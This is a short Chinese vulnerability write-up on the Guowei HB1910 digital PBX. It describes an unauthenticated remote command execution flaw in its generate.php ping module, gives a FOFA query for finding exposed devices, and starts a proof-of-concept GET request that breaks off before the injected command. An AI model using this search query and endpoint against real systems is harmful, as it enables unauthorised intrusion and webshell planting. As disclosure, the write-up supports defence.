0x01 产品简介

国威HB1910数字程控电话交换机是一款功能强大的通信设备，国威HB1910数字程控电话交换机符合国家工信部YD 344-1990《自动用户交换机进网要求》规范，以及其他多项国家安全标准规范，如YD/T 1141-2007、YD/T 729-1994、YD/T 751-1995等。同时，设备还具备自动检测、诊断故障、故障自动显示灯告警等功能，确保设备的稳定运行。适用于各种需要高效、稳定通信的场合，如企业办公、酒店前台、监控管理中心等。其丰富的功能和强大的性能能够满足不同用户的需求。

0x02 漏洞概述

国威HB1910数字程控电话交换机 generate.php 接口存在远程命令执行漏洞，未经身份验证的恶意攻击者可以利用该漏洞远程执行任意命令，写入webshell后门文件，获取服务器权限。

0x03 复现环境

FOFA：

body="themes/tenant/css/login.css"

0x04 漏洞复现

PoC

GET /modules/ping/generate.php?send=Ping&hostname